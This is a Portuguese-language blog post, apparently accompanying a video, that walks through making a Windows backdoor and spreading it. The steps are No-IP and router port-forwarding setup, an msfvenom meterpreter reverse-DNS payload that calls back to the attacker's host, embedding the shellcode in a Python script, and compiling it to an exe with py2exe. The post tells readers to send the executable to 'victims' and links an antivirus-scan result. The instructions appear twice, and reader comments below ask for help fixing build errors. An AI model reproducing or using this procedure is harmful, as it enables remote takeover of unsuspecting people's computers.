Video
Instalando NOIP no Debian
Link DROP: http://adf.ly/1TNc5t
LInk NOIP: http://adf.ly/1TNgHZ
# tar -xf noip-duc-linux.tar.gz
# cd noip-2.1.9.1
# cp binaries/noip2-$(uname -m) noip2
# make install
-- ENTER YOUR EMAIL:
-- ENTER YOUR PASS:
-- Update Interval: [30] 5
-- Run Update [N] (y/n) n
Download do Script Running noip2.sh
Link DROP: http://adf.ly/1TNcCQ
# chmod+x noip2
# ./noip2 start
Abrindo Porta no moden Telsec (OI Velox)
Nav: 192.168.1.1
-- ENTER YOUR USER
-- ENTER YOUR PASS
-> Services -> NAT/NAPT -> Virtual Server :
-- User-defined Service Name: INSIRA O NOME
-- WAN Interface: SELECIONE any
-- WAN Port: ENTER com sua porta
-- LAN Open Port: ENTER com sua porta
-- LAN Ip Address: ENTER com seu ip local
Criando a ShellScript.py (Exploit Code)
# nano shellscript.py
Faça download do Arquivo aqui: http://adf.ly/1Y2pEb
Criando Exploit Code (msfvenom, windows reverse dns)
# msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=YOUR_ADDR_NOIP_HERE.no-ip.org LPORT=YOUR_PORT_HERE -b '\x00\x0a\x0d\x40' -f c
Copie o Payload Code para shellscript.py na linha 6:
AJhJAH8h7hhsfdfA = ("SHELL_CODE_HERE");
Defenições:
-p Especificar o PAYLOAD
-b Remover o bad characters
-- Referencia Bad characters http://insidetrust.blogspot.com.br/2011/02/using-backtrack-to-spot-bad-characters.html
-f Formato linguagem C
Criando resource.rc (msfcosole)
Faça Download 4shared: http://adf.ly/1Y2ot7
Referencias:
https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
Start PostgreSQL && Msfconsole + resource.rc
# /etc/init.d/postgresql start
# msfconsole -r msf_reverse_tcp_dns.rc -q
Defenições:
-r Arquivo Resource.rc
-q Start msfconsole sem o Barnner
Use: msfconsole -h mais infos
Compilando shellscript.py para executavél
Copie shellscript.py para a pasta build-exe
Download da pasta build-exe 4shared: http://adf.ly/1Y59vK
Renomei shellscript.py para main.py
Abra o Prompt de comando:
Acesse a pasta build-exe
Configure as variaveis de ambientes do windows como no video
;c:\python27\
edite build.py com suas variaveis, esta tudo comentado
Execulte:
#- python build.py py2exe
Instalações python 2.7: http://adf.ly/1TNfdt
instalação py2exe: http://adf.ly/1TNgCG
Download pasta pacote compile: http://adf.ly/1XkLC2
Pronto seu script python agora virou um execultavel
Envie o execultavel para suas Vitimas e Have Fun
Virus Scan: https://virusscan.jotti.org/en-US/filescanjob/82f68kx1r3
Game Over
Instalando NOIP no Debian
Link DROP: http://adf.ly/1TNc5t
LInk NOIP: http://adf.ly/1TNgHZ
# tar -xf noip-duc-linux.tar.gz
# cd noip-2.1.9.1
# cp binaries/noip2-$(uname -m) noip2
# make install
-- ENTER YOUR EMAIL:
-- ENTER YOUR PASS:
-- Update Interval: [30] 5
-- Run Update [N] (y/n) n
Download do Script Running noip2.sh
Link DROP: http://adf.ly/1TNcCQ
# chmod+x noip2
# ./noip2 start
Abrindo Porta no moden Telsec (OI Velox)
Nav: 192.168.1.1
-- ENTER YOUR USER
-- ENTER YOUR PASS
-> Services -> NAT/NAPT -> Virtual Server :
-- User-defined Service Name: INSIRA O NOME
-- WAN Interface: SELECIONE any
-- WAN Port: ENTER com sua porta
-- LAN Open Port: ENTER com sua porta
-- LAN Ip Address: ENTER com seu ip local
Criando a ShellScript.py (Exploit Code)
# nano shellscript.py
Faça download do Arquivo aqui: http://adf.ly/1Y2pEb
Criando Exploit Code (msfvenom, windows reverse dns)
# msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=YOUR_ADDR_NOIP_HERE.no-ip.org LPORT=YOUR_PORT_HERE -b '\x00\x0a\x0d\x40' -f c
Copie o Payload Code para shellscript.py na linha 6:
AJhJAH8h7hhsfdfA = ("SHELL_CODE_HERE");
Defenições:
-p Especificar o PAYLOAD
-b Remover o bad characters
-- Referencia Bad characters http://insidetrust.blogspot.com.br/2011/02/using-backtrack-to-spot-bad-characters.html
-f Formato linguagem C
Criando resource.rc (msfcosole)
Faça Download 4shared: http://adf.ly/1Y2ot7
Referencias:
https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
Start PostgreSQL && Msfconsole + resource.rc
# /etc/init.d/postgresql start
# msfconsole -r msf_reverse_tcp_dns.rc -q
Defenições:
-r Arquivo Resource.rc
-q Start msfconsole sem o Barnner
Use: msfconsole -h mais infos
Compilando shellscript.py para executavél
Copie shellscript.py para a pasta build-exe
Download da pasta build-exe 4shared: http://adf.ly/1Y59vK
Renomei shellscript.py para main.py
Abra o Prompt de comando:
Acesse a pasta build-exe
Configure as variaveis de ambientes do windows como no video
;c:\python27\
edite build.py com suas variaveis, esta tudo comentado
Execulte:
#- python build.py py2exe
Instalações python 2.7: http://adf.ly/1TNfdt
instalação py2exe: http://adf.ly/1TNgCG
Download pasta pacote compile: http://adf.ly/1XkLC2
Pronto seu script python agora virou um execultavel
Envie o execultavel para suas Vitimas e Have Fun
Virus Scan: https://virusscan.jotti.org/en-US/filescanjob/82f68kx1r3
Game Over

excellent work
ResponderExcluirj'ai bien suivis le tutorial mais un message errors occurred
Excluirthe message says:errors occurred
see see the logfile 'C:\Users\j\Desktop\build-exe\dist\main.exe.log'for details
ImportError: No module named win32api>>>>how to get solution
So Sorru. excuse for not having answered you, google not warn me about comments
ExcluirTry to install pywin32 from here :
http://sourceforge.net/projects/pywin32/files/pywin32/
depends on you operation system and the python version that you are using. Normally 32bit version should works on both 32 and 64 bit OS
liens de teleshargement mort
ResponderExcluirje veux build-exe si possible
ResponderExcluirThe link of the download of the compiler file is dead, can you give an other thanks !
ResponderExcluir